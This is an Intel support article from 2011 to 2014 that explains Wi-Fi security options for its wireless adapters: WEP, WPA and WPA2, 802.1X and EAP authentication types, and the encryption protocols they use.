Wireless Products
Intel® Wi-Fi Products
Wi-Fi Security Overview

Protecting your Wi-Fi network

Your wireless network, if left unprotected, is vulnerable to access from other computers. You can easily protect your home and small business network from nearly all forms of unauthorized access with the security methods described in this article.

  • Authentication
    • Authentication is the process of identifying and approving a request from a client (supplicant, usually a laptop) to access a network at a network access point. Once authentication is completed and access is granted, the client has access to the network. IEEE 802.11 Authentication is not to be confused with IEEE 802.1X link-layer network authentication of users. 802.11 Authentication and Association occur at the access point (AP) or broadband wireless router level prior to any upper layer authentication (802.1X), which takes advantage of special "back-end" servers to identify individual users based on various credential types.
    • 802.11 authentication requires that a station (mobile device) establish its identity before sending frames. This process occurs every time a station connects to a network but does not provide any measure of network security. 802.11 authentication is simply the first step in a handshake process for network attachment that is not mutual, meaning only the AP authenticates the station and not vice versa. Also note there is no data encryption at this level.
  • Encryption
    • You can select encryption algorithms to encrypt the information and data that is sent across your wireless network. Only computers equipped with pre-shared keys can encrypt and decrypt the data being transmitted.
    • Encryption keys are available with two levels of security, 64-bit and 128-bit. Use 128-bit keys for greater security.
  • SSID Broadcasting
    • A simple way to improve network security is to set your network access point to not broadcast the Service Set Identifier (SSID). The SSID is needed to gain access. Only those computers with knowledge of the SSID can access the network. (This is not set at the adapter using the Intel® PROSet/Wireless WiFi Connection Utility; it is set at the access point.). This is not secure and not the recommended way of securing your wireless network.

Personal security methods

Open and shared network authentication
IEEE 802.11 supports two types of network authentication methods: Open System and Shared Key.

  • When open authentication is used, any wireless station can request authentication. The station that needs to authenticate with another wireless station sends an authentication management request that has the identity of the sending station. The receiving station or access point grants any request for authentication. Open authentication allows any device to gain network access. If no encryption is enabled on the network, any device that knows the Service Set Identifier (SSID) of the access point can gain access to the network.
  • When shared key authentication is used, each wireless station is assumed to have received a secret shared key over a secure channel that is independent from the 802.11 wireless network communications channel. You can share this secret key via a wired Ethernet connection, or by physically using a USB memory stick or CD. Shared key authentication requires that the client configure a static WEP key. The client access is granted only if it passes a challenge-based authentication.

WEP

  • Wired Equivalent Privacy (WEP) uses encryption to help prevent unauthorized reception of wireless data.
  • WEP uses an encryption key to encrypt data before transmitting it. Only computers that use the same encryption key can access the network and decrypt the data transmitted by other computers.
  • WEP encryption provides for two levels of security, using a 64-bit key (sometimes referred to as 40-bit) or a 128-bit key (also known as 104-bit). For stronger security, you should use a 128-bit key. If you use encryption, all wireless devices on your wireless network must use the same encryption keys.
  • With WEP data encryption, a wireless station can be configured with up to four keys (the key index values are 1, 2, 3, and 4).
  • When an access point (AP) or a wireless station transmits an encrypted message that uses a key stored in a specific key index, the transmitted message indicates the key index that was used to encrypt the message body.
  • The receiving AP or wireless station can then retrieve the key that is stored at the key index and use it to decode the encrypted message body.
  • Because the WEP encryption algorithm is vulnerable to network attacks, you should consider using WPA-Personal or WPA2-Personal security.

WPA-Personal

  • WPA-Personal mode is targeted to home and small business environments.
  • WPA Personal requires manual configuration of a pre-shared key (PSK) on the access point and clients. No authentication server is needed.
  • The same password entered at the access point needs to be used on the connecting computer and all other wireless devices that access the wireless network.
  • Security depends on the strength and secrecy of the password. The longer the password, the stronger is the security of the wireless network.
  • If your wireless access point or router supports WPA Personal and WPA2-Personal then you should enable it on the access point and provide a long, strong password.
  • WPA-Personal is compatible with the TKIP and AES-CCMP data encryption algorithms.

WPA2-Personal

  • WPA2-Personal requires manual configuration of a pre-shared key (PSK) on the access point and clients. No authentication server is needed.
  • The same password entered at the access point needs to be used on the connecting computer and all other wireless devices that access the wireless network.
  • Security depends on the strength and secrecy of the password. The longer the password, the stronger is the security of the wireless network.
  • WPA2 is an improvement over WPA and implements the full IEEE 802.11i standard. WPA2 is backward compatible with WPA.
  • WPA2-Personal is compatible with the TKIP and AES-CCMP data encryption algorithms.

802.1X authentication (enterprise security)

Overview
The 802.1X authentication is independent of the 802.11 authentication process. The 802.11 standard provides a framework for various authentication and key-management protocols. There are different 802.1X authentication types and each provides a different approach to authentication, but all employ the same 802.11 protocols and framework for communication between a client and an access point.

In most protocols, after completion of the 802.1X authentication process, the client receives a key that it uses for data encryption.

With 802.1X authentication, an authentication method is used between the client and a server; for example, a Remote Authentication Dial-In User Service (RADIUS) server, connected to the access point. The authentication process uses credentials, such as a user's password, that are not transmitted over the wireless network.

Most 802.1X types support dynamic per-user, per-session keys to strengthen the key security. The 802.1X authentication benefits from the use of an existing authentication protocol known as the Extensible Authentication Protocol (EAP).

The 802.1X authentication for wireless networks has three main components:

  • The authenticator (the access point)
  • The supplicant (the client software)
  • The authentication server

The 802.1X authentication security initiates an authorization request from the wireless client to the access point, which authenticates the client to an Extensible Authentication Protocol (EAP) compliant RADIUS server. This RADIUS server can authenticate either the user (via passwords or certificates) or the system (by MAC address).

In theory, the wireless client is not allowed to join the networks until the transaction is complete. Not all authentication methods use a RADIUS server. WPA-Personal and WPA2-Personal use a common password that must be entered at the access point and at all devices requesting access to the network.

There are several authentication algorithms used with 802.1X. The three main vendors (supported by the PROSet Utility) and their authentication algorithms are:

  • Microsoft:
    • PEAP – MSCHAPV2
    • TLS
    • PEAP-TLS
  • Cisco:
    • LEAP
    • PEAP-GTC
    • EAP-FAST
  • Intel:
    • TTLS
    • EAP-SIM
    • EAP-AKA

These are all methods for the wireless client to identify itself to the RADIUS server. With RADIUS authentication, user identities are checked against databases. RADIUS constitutes a set of standards that addresses Authentication, Authorization, and Accounting (AAA).

How 802.1X authentication works
Following is a simplified description of how 802.1X authentication works.

  1. A client sends a "request to access" message to an access point. The access point requests the identity of the client.
  2. The client replies with its identity packet, which is passed along to the authentication server.
  3. The authentication server sends an "accept" packet to the access point.
  4. The access point puts the client port in the authorized state and data traffic is allowed to proceed.

802.1X features
The following authentication methods are supported on Microsoft Windows XP*:

  • 802.1X supplicant protocol support.
  • Support for the Extensible Authentication Protocol (EAP).

For Microsoft Windows Vista* and Microsoft Windows 7*, Microsoft’s native supplicant is used to do EAP operations as opposed to Microsoft Windows XP* where the Intel® PROSet/Wireless client utility runs the supplicant state machine for EAPOL.

Supported Authentication Methods on Microsoft Windows XP* and higher:

  • EAP TLS.
  • EAP Tunneled TLS (TTLS).
  • Cisco LEAP.
  • PEAP.
  • EAP-SIM.
  • EAP-FAST.
  • EAP-AKA.

Network authentication

  • Open
  • Shared
  • WPA-Personal
  • WPA2-Personal
  • WPA Enterprise
  • WPA2 Enterprise

WPA/WPA2 Enterprise verify network users through a RADIUS or other authentication server. They use 128-bit encryption keys and dynamic session keys to ensure your wireless network's privacy and enterprise security. An authentication type is selected to match the authentication protocol of the 802.1X server.

Data encryption

  • AES-CCMP
    Advanced Encryption Standard - Counter CBC-MAC Protocol. This is the new method for privacy protection of wireless transmissions specified in the IEEE 802.11i standard. AES-CCMP provides a stronger encryption method than TKIP. Choose AES-CCMP as the data encryption method when strong data protection is important. AES-CCMP is available with WPA/WPA2 Personal/Enterprise network authentication.
    Note Some security solutions are not supported by your computer operating system and can require other software or hardware, and wireless LAN infrastructure support.
  • TKIP
    Temporal Key Integrity Protocol provides per-packet key mixing, a message integrity check, and a rekeying mechanism. TKIP is available with WPA/WPA2 Personal/Enterprise network authentication.
  • CKIP
    Cisco Key Integrity Protocol (CKIP) is Cisco proprietary security protocol for encryption in 802.11 media. CKIP uses the following features to improve 802.11 security in infrastructure mode:
    • Key Permutation (KP)
    • Message Sequence Number
    NOTE CKIP is not used with WPA/WPA2 Personal/Enterprise network authentication.
    NOTE CKIP is only supported through the use of the WiFi connection utility on Windows* XP.
  • WEP
    Wired Equivalent Privacy is a part of the original 802.11 standard and a weak security protocol which uses keys which are 10 or 26 hexadecimal digits long. It uses the stream cipher RC-4 for confidentiality and the CRC-32 checksum for integrity.

Authentication types

  • TLS
    A type of authentication method using the Extensible Authentication Protocol (EAP) and a security protocol called the Transport Layer Security (TLS). EAP-TLS uses certificates that use passwords. EAP-TLS authentication supports dynamic WEP key management. The TLS protocol is intended to secure and authenticate communications across a public network through data encryption. The TLS Handshake Protocol allows the server and client to provide mutual authentication and to negotiate an encryption algorithm and cryptographic keys before data is transmitted.
  • TTLS
    In TTLS (Tunneled Transport Layer Security), the client uses EAP-TLS to validate the server and create a TLS-encrypted channel between the client and server. The client can use another authentication protocol. Typically, password-based protocols challenge over a non-exposed TLS encrypted channel. TTLS implementations today support all methods defined by EAP, and several older methods (PAP, CHAP, MS-CHAP and MS-CHAP-V2). TTLS can easily be extended to work with new protocols by defining new attributes to support new protocols.
  • PEAP
    PEAP is a new Extensible Authentication Protocol (EAP) IEEE 802.1X authentication type designed to take advantage of server-side EAP-Transport Layer Security (EAP-TLS) and to support various authentication methods, including users' passwords, one-time passwords, and Generic Token Cards.
  • LEAP
    Light Extensible Authentication Protocol (LEAP) is a proprietary extensible authentication protocol developed by Cisco that provides a challenge-response authentication mechanism and dynamic key assignment. When a wireless access point communicates with a Cisco LEAP-enabled RADIUS (Cisco Secure Access Control Server [ACS]), Cisco LEAP provides access control through mutual authentication between client WiFi adapters and the wireless networks and provides dynamic, individual user encryption keys to help protect the privacy of transmitted data.
  • EAP-SIM
    Extensible Authentication Protocol Method for GSM Subscriber Identity (EAP-SIM) is a mechanism for authentication and session key distribution. It uses the Global System for Mobile Communications (GSM) Subscriber Identity Module (SIM). EAP-SIM uses a dynamic session-based WEP key, which is derived from the client adapter and RADIUS server, to encrypt data. EAP-SIM requires you to enter a user verification code, or PIN, for communication with the Subscriber Identity Module (SIM) card. A SIM card is a special smart card that is used by Global System for Mobile Communications (GSM) based digital cellular networks.
  • EAP-AKA
    EAP-AKA (Extensible Authentication Protocol Method for UMTS Authentication and Key Agreement) is an EAP mechanism for authentication and session key distribution, using the Universal Mobile Telecommunications System (UMTS) Subscriber Identity Module (USIM). The USIM card is a special smart card used with cellular networks to validate a given user with the network.

EAP-FAST

  • EAP-FAST, like EAP-TTLS and PEAP, uses tunneling to protect traffic. The main difference is that EAP-FAST does not use certificates to authenticate. Provisioning in EAP-FAST is negotiated solely by the client as the first communication exchange when EAP-FAST is requested from the server. If the client does not have a pre-shared secret Protected Access Credential (PAC), it is able to initiate a provisioning EAP-FAST exchange to dynamically obtain one from the server.
  • EAP-FAST documents two methods to deliver the PAC: manual delivery through an out-of-band secure mechanism and automatic provisioning.
  • Manual delivery mechanisms are any delivery mechanism that the administrator of the network considers sufficiently secure.
  • Automatic provisioning establishes an encrypted tunnel to protect the authentication of the client and the delivery of the PAC to the client. This mechanism, while not as secure as a manual method may be, is more secure than the authentication method used in LEAP.
  • The EAP-FAST method is divided into two parts: provisioning and authentication. The provisioning phase involves the initial delivery of the PAC to the client. This phase only needs to be performed once per client and user.

Authentication protocols

  • PAP
    Password Authentication Protocol is a two-way handshake protocol designed for use with PPP. PAP is a plain text password used on older SLIP systems. It is not secure. This is only available for TTLS Authentication Type.
  • CHAP
    Challenge Handshake Authentication Protocol is a three-way handshake protocol that is considered more secure than Password Authentication Protocol. This is only available for TTLS authentication Type.
  • MS-CHAP (MD4)
    This uses a Microsoft version of RSA Message Digest 4 challenge-and-reply protocol. This only works on Microsoft systems and enables data encryption. To select this authentication method causes all data to be encrypted. This is only available for TTLS authentication type.
  • MS-CHAP-V2
    This introduces an additional feature not available with MS-CHAP-V1 or standard CHAP authentication, the change password feature. This feature allows the client to change the account password if the RADIUS server reports that the password has expired. This is available for TTLS and PEAP authentication types.
  • Generic Token Card (GTC)
    This carries user-specific token cards for authentication. The main feature in GTC is Digital Certificate/Token Card based authentication. In addition, GTC includes the ability to hide user name identities until the TLS encrypted tunnel is established, which provides additional confidentiality that user names are not being broadcast during the authentication phase. It is only available for PEAP authentication type.
  • TLS
    The TLS protocol is intended to secure and authenticate communications across a public network through data encryption. The TLS Handshake Protocol allows the server and client to provide mutual authentication and to negotiate an encryption algorithm and cryptographic keys before data is transmitted. Only available for PEAP authentication type.

This applies to:

Intel® Centrino® Advanced-N + WiMAX 6250
Intel® Centrino® Advanced-N 6200
Intel® Centrino® Advanced-N 6205
Intel® Centrino® Advanced-N 6205 For Desktop
Intel® Centrino® Advanced-N 6230
Intel® Centrino® Advanced-N 6235
Intel® Centrino® Ultimate-N 6300
Intel® Centrino® Wireless-N + WiMAX 6150
Intel® Centrino® Wireless-N 100
Intel® Centrino® Wireless-N 1000
Intel® Centrino® Wireless-N 1030
Intel® Centrino® Wireless-N 105
Intel® Centrino® Wireless-N 130
Intel® Centrino® Wireless-N 135
Intel® Centrino® Wireless-N 2200
Intel® Centrino® Wireless-N 2200 For Desktop
Intel® Centrino® Wireless-N 2230
Intel® Dual Band Wireless-AC 3160
Intel® Dual Band Wireless-AC 7260
Intel® Dual Band Wireless-AC 7260 for Desktop
Intel® Dual Band Wireless-AC 7265
Intel® Dual Band Wireless-N 7260
Intel® Dual Band Wireless-N 7265
Intel® PRO/Wireless 3945ABG Network Connection
Intel® WiFi Link 1000
Intel® WiFi Link 5300 and Intel® WiFi Link 5100 products
Intel® WiMAX/WiFi Link 5350 and Intel® WiMAX/WiFi Link 5150 products
Intel® Wireless WiFi Link 4965AGN
Intel® Wireless-N 7260
Intel® Wireless-N 7265

Solution ID: CS-032784
Last Modified: 29-Oct-2014
Date Created: 18-Sep-2011
Back to Top